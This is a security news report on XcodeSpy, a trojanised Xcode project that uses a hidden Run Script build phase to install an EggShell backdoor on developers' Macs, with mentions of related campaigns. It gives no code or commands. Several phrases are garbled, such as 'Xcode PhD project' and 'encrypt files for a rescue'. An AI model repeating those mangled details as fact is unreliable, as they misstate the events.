Cybersecurity researchers unveiled a new attack on Thursday in which threat actors take advantage of Xcode as an attack vector to engage Apple platform developers with a back door, adding to a growing trend of targeting developers and researchers with malicious attacks.
The Xcode project, called “XcodeSpy,” is a tainted version of a legitimate open source project available on GitHub called TabBarInteraction that developers use to animate iOS tab bars based on user interaction.
“XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer’s macOS computer along with a persistence mechanism,” SentinelOne researchers said.
Xcode is Apple’s integrated development environment (IDE) for macOS, which is used to develop software for macOS, iOS, iPadOS, watchOS and tvOS.
Earlier this year, Google’s Threat Analysis group unveiled a North Korean campaign targeting security researchers and developer exploiters, which involved sharing a Visual Studio project designed to load a malicious DLL into systems. Windows.
The Xcode PhD project does something similar, only this time the attacks have highlighted Apple developers.
In addition to including the original code, XcodeSpy also contains an obscure execution script that runs when the developer build goal is started. The script contacts an attacker-controlled server to retrieve a custom variant of the EggShell backdoor on the development machine, which includes features for recording information from the victim’s microphone, camera, and keyboard.
“XcodeSpy takes advantage of an integrated feature of the Apple IDE that allows developers to run a custom shell script when launching an instance of their target application,” the researchers said. “While the technique is easy to identify if searched for, new or inexperienced developers who are unaware of the Run Script feature are especially at risk, as there are no indications on the console or debugger indicating the malicious script execution. “
SentinelOne said it identified two variants of the EggShell payload, with samples uploaded to VirusTotal from Japan on August 5 and October 13 last year. Additional clues point to an unnamed American organization that is said to have been targeted for this campaign between July and October 2020, and that there are likely to be other developers in Asia as well.
Opponents have previously resorted to contaminated Xcode executables (also known as XCodeGhost) to inject malicious code into iOS applications compiled with the infected Xcode without the developers’ knowledge, and then use the infected applications to collect information from the devices once they are downloaded and installed in the App Store.
In August 2020, Trend Micro researchers discovered a similar threat that spread through modified Xcode projects, which, when built, were configured to install a mac malware called XCSSET to steal credentials. , capture screenshots, sensitive messaging data and note-taking apps, and even encrypt files for a rescue.
But instead, XcodeSpy takes a simpler route, as the goal seems to be to attack the developers themselves, although the ultimate goal behind the exploitation and the identity of the group behind it is still unclear.
“Targeting software developers is the first step in a successful supply chain attack. One way to do this is to abuse the development tools needed to carry out this work,” the researchers said.
“It’s quite possible that XcodeSpy is targeting a particular developer or group of developers, but there are other potential scenarios with such high casualties. Attackers could simply be looking for interesting targets and collecting data for future campaigns, or they could try gather AppleID credentials for use in other campaigns using malicious software with valid Apple Developer code signatures. “